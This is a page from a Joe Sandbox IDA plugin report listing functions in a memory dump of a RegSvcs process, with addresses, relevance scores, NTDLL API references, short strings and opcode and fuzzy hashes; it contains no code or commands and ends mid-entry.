Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 48ee638e63fb3e47868c7b204f36d6e4118942e06b08f38943c61144f4ce5a6a
Instruction ID: 934238d591757b9c18b0b460981ed7c274fcd603904170a648cf01f6bcdb8a83
Opcode Fuzzy Hash: 48ee638e63fb3e47868c7b204f36d6e4118942e06b08f38943c61144f4ce5a6a
Instruction Fuzzy Hash: DC714771A0014A9FDB09DFA9C990BAEBBF8BF18744F154065E905A7251EB34EE01CBA1

Function 011629F9 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 011A259B

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d030a1225216f88c5e689b66d4f82e33c1f35eae0ba014bd1b9ac47e7d9a0f0a
Instruction ID: 17ed47733738c2902891e72837741efe767e5a9a747b3bf2a9459c5f6e1d9a7f
Opcode Fuzzy Hash: d030a1225216f88c5e689b66d4f82e33c1f35eae0ba014bd1b9ac47e7d9a0f0a
Instruction Fuzzy Hash: AD0280B5D002299FDB39DB54CC80BE9BBB8AF54304F4141EAEA09A7241E7319F94CF59

Function 01150C44 Relevance: 1.7, APIs: 1, Instructions: 152timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01150CDC

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 90ef8cdaafa3fcd23f98053977ddfd5b09c3ddcdc72956f026f03a9b052c0fa6
Instruction ID: e67933cf98cde06d2ed737feb80742b811afe96916b0d9d5b18efac96d247084
Opcode Fuzzy Hash: 90ef8cdaafa3fcd23f98053977ddfd5b09c3ddcdc72956f026f03a9b052c0fa6
Instruction Fuzzy Hash: F451DC70A00206EFDF2CDFA8D945ABEB3F4EF48708F14446CE81297210E735AA45CB11

Function 0116C720 Relevance: 1.6, APIs: 1, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0116C7BF

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: cd9e3786009bbf4d018b4a8e25547e9134bf5ae7548d5e9c3e9b68b00f06c445
Instruction ID: 8eb6ac9697ef322b57728f0500c8544e8a19dd0e5872fdd9aba92d95cde6151e
Opcode Fuzzy Hash: cd9e3786009bbf4d018b4a8e25547e9134bf5ae7548d5e9c3e9b68b00f06c445
Instruction Fuzzy Hash: 7A41C176504311BBDB39EF68E844B6B7BE8BF48654F00492AF98897250E779D810CB92

Function 0115EBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5861a8f35491581e06681df387a58f20529c661f6fd5bc80ac8e242582f7c76
Instruction ID: d73380bebf67d7ef65876f8911de8a462ad03d52653395138d4e9238cec45e72
Opcode Fuzzy Hash: b5861a8f35491581e06681df387a58f20529c661f6fd5bc80ac8e242582f7c76
Instruction Fuzzy Hash: 8C41F571604302DFDB6CDF28C884A6BBBE5FF84228F014829E967C7611DB31E945CB51

Function 011264BA Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0112656C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d97b35231a831c56ec8c4d2d3111e48694c7123052981fa6f854ad7e35b233d9
Instruction ID: 7be9ecf3ec64123f570ba2b2de34430e8e402098300a9b6f38b16d752508c6e8
Opcode Fuzzy Hash: d97b35231a831c56ec8c4d2d3111e48694c7123052981fa6f854ad7e35b233d9
Instruction Fuzzy Hash: AE41D671244315AFEB2CEF14E885FBEB7E4FB84648F00882DE98667194D730E910CB92

Function 0113262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01132710

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 39c8e4adc2273bdfad848bb5ab7f19897420136627d6198c77d8d11ffebbd3aa
Instruction ID: 56289fdfc9f155b99346c05a250b49ce35ccd3d25ce4dc2dbfbd097ab72c15f5
Opcode Fuzzy Hash: 39c8e4adc2273bdfad848bb5ab7f19897420136627d6198c77d8d11ffebbd3aa
Instruction Fuzzy Hash: 1241E2B1901B11DFCB2EFF28D900B69B7B1FF94314F1182A9C8169B2A5DB309941CF52

Function 011B07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011B083C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1304b118092a5e55ff902e5eea40ac5b1a2ac38129c6d2807a61b7b61c797199
Instruction ID: f57d37f65df2341e970533bb9b8bf7be536959cc8140dd8312ce40e2dedf26f1
Opcode Fuzzy Hash: 1304b118092a5e55ff902e5eea40ac5b1a2ac38129c6d2807a61b7b61c797199
Instruction Fuzzy Hash: 14419072908345AFD724DF29C844B9BFBE8FF88614F004A2EF998C7250D7709904CB92

Function 0115245A Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2c3c69d9f35f2b9f50fad1aa555e870a4b9e0d38786f845b9de6ff31270503
Instruction ID: 847255f6434a20df5425760c4ab786b5471d6352ac32a417ea7d65e7428ec81f
Opcode Fuzzy Hash: 1b2c3c69d9f35f2b9f50fad1aa555e870a4b9e0d38786f845b9de6ff31270503
Instruction Fuzzy Hash: 52312672A00201FBDF3DDF5DB889AAEBBB5FF84B14F260019E920A7245D7B45985C781

Function 01134859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011348F7

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: aa289a66c7020611111692d18976c2cb5d360835fb99a4628d5be76900855bb0
Instruction ID: 6c9b5138bba9e4e286ef6a1e743271b6bb905a95c335f1dc2bb733a5be577431
Opcode Fuzzy Hash: aa289a66c7020611111692d18976c2cb5d360835fb99a4628d5be76900855bb0
Instruction Fuzzy Hash: 3641D3312043028FD72DDF28D884B2ABBEAEFC4764F14446DEA558B695EB34D941CB91

Function 01128A00 Relevance: 1.6, APIs: 1, Instructions: 85timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01128A8B

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 50a0a09c52f7acf142e755534e59c0eb68eed744ae3920cd64526cf718c732a8
Instruction ID: 957768f6a8025a9c64d456fa83a64e2058b5560a2cae99e15fa8f7c577bb2b71
Opcode Fuzzy Hash: 50a0a09c52f7acf142e755534e59c0eb68eed744ae3920cd64526cf718c732a8
Instruction Fuzzy Hash: 4E31F0B1A04A16EFDB2AEF64D940B6DB7F1FF48314F044119D80253A81CB35A8A0CFA1

Function 011B892A Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a0a28a150832b15137e4a94d095f08ac7a07f377650fd87e37f95af3098142
Instruction ID: 981074719c41b36e14ab71ac3799285133faf93b175cdda72a5db0722e8f842a
Opcode Fuzzy Hash: 04a0a28a150832b15137e4a94d095f08ac7a07f377650fd87e37f95af3098142
Instruction Fuzzy Hash: BF014732210226ABEF3C6E1598C8BEABB69EFC2E58B04012CF64106055DB20AC81C792

Function 011BA4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011BA51A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c0c30b30493b1c84e02619277ebd89f78e5710777ae189fcf6bb13cb790c0433
Instruction ID: 0a4b3fca6c183f8d37e4c74d6cf9867e5b8fa7c038addec004a53fe182ac6cc4
Opcode Fuzzy Hash: c0c30b30493b1c84e02619277ebd89f78e5710777ae189fcf6bb13cb790c0433
Instruction Fuzzy Hash: 19018936100219ABCF269E84E844EDE7F66FF4C754F068101FE1866220C336D970EB81

Function 011B8D20 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011B8D6A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 67165a834aa88e8d4759a47530a686d37e063922c3c7225930dbde4eb92edf44
Instruction ID: f96cda8cc6f944d4c7453050b189328b55cb00d045bf4899996ef3998d72633f
Opcode Fuzzy Hash: 67165a834aa88e8d4759a47530a686d37e063922c3c7225930dbde4eb92edf44
Instruction Fuzzy Hash: 7BF0B4325102647BD7396A1CE888BEEBB5DFBD5B14F094616FD492716587706C80C790

Function 011B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 011B65C1

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e164b0728156a40347f1bf8cf8d96c945991addd2605c078771e3fd496a97fc4
Instruction ID: bc1c6e0e24803123a68d8e19c52466e11f89bfd9de0f5b9173621ba9e0c13d58
Opcode Fuzzy Hash: e164b0728156a40347f1bf8cf8d96c945991addd2605c078771e3fd496a97fc4
Instruction Fuzzy Hash: BF917372900619AFEB29DF95CC85FEEBBB8EF18B54F100065F610AB191D774AD00CBA0

Function 01168402 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01168591

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 37e0065ae188a16b906e038bef1aa50bc2a6aa56a1e84e5e029fdf6853e90920
Instruction ID: b59530b26d1182361e9acd71bcc631e43eeaa3496d8879bdb5434f0313532114
Opcode Fuzzy Hash: 37e0065ae188a16b906e038bef1aa50bc2a6aa56a1e84e5e029fdf6853e90920
Instruction Fuzzy Hash: 77918B71508345AFD72ADE25C840FABBAECFB84758F40092EFA8492151E735D915CB62

Function 0116273C Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 011628D8

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local
API String ID: 0-5346580
Opcode ID: 75b596b3cf27ade18c149e419852b9a0a04079662c4a4971fcff87fa8cf9b6f5
Instruction ID: 922bef7a16f8851203dc7ad93c34bd2338a500fd1fe72a583df68e1764841d57
Opcode Fuzzy Hash: 75b596b3cf27ade18c149e419852b9a0a04079662c4a4971fcff87fa8cf9b6f5
Instruction Fuzzy Hash: 06A1D03590022ADBDB2CCF68CC84BA9B7B9BF58354F1541EAD908A7351E7319E90CF81

Function 0112A197 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0118C1E4

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: \??\
API String ID: 0-3047946824
Opcode ID: 7e9d703e79f789f6f87234c22375e18578c0378608471dcc237abf92be81aa63
Instruction ID: 6482c5264e50cfc23c41d91afa6d88ee5a9666f492437365f6c058507d464bbb
Opcode Fuzzy Hash: 7e9d703e79f789f6f87234c22375e18578c0378608471dcc237abf92be81aa63
Instruction Fuzzy Hash: 44A17E719112299BDB35EF68CC88BEAB7B8EF44704F1041E9E909A7250D7359EC5CFA0

Function 01168620 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 011A52E3

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 099112c719d93e707c2a003abe3d45cde5e98c3250411ba9de014251a76ed3ed
Instruction ID: c5f611a99c7add780a3efd322ce08d074a25578b7d21897e3cc7bfa2d10f1672
Opcode Fuzzy Hash: 099112c719d93e707c2a003abe3d45cde5e98c3250411ba9de014251a76ed3ed
Instruction Fuzzy Hash: D381BDB5A44358EFDB68CF99C844BAEBBBAFB48704F548129F504B7640D371A941CB60

Function 01168BF0 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

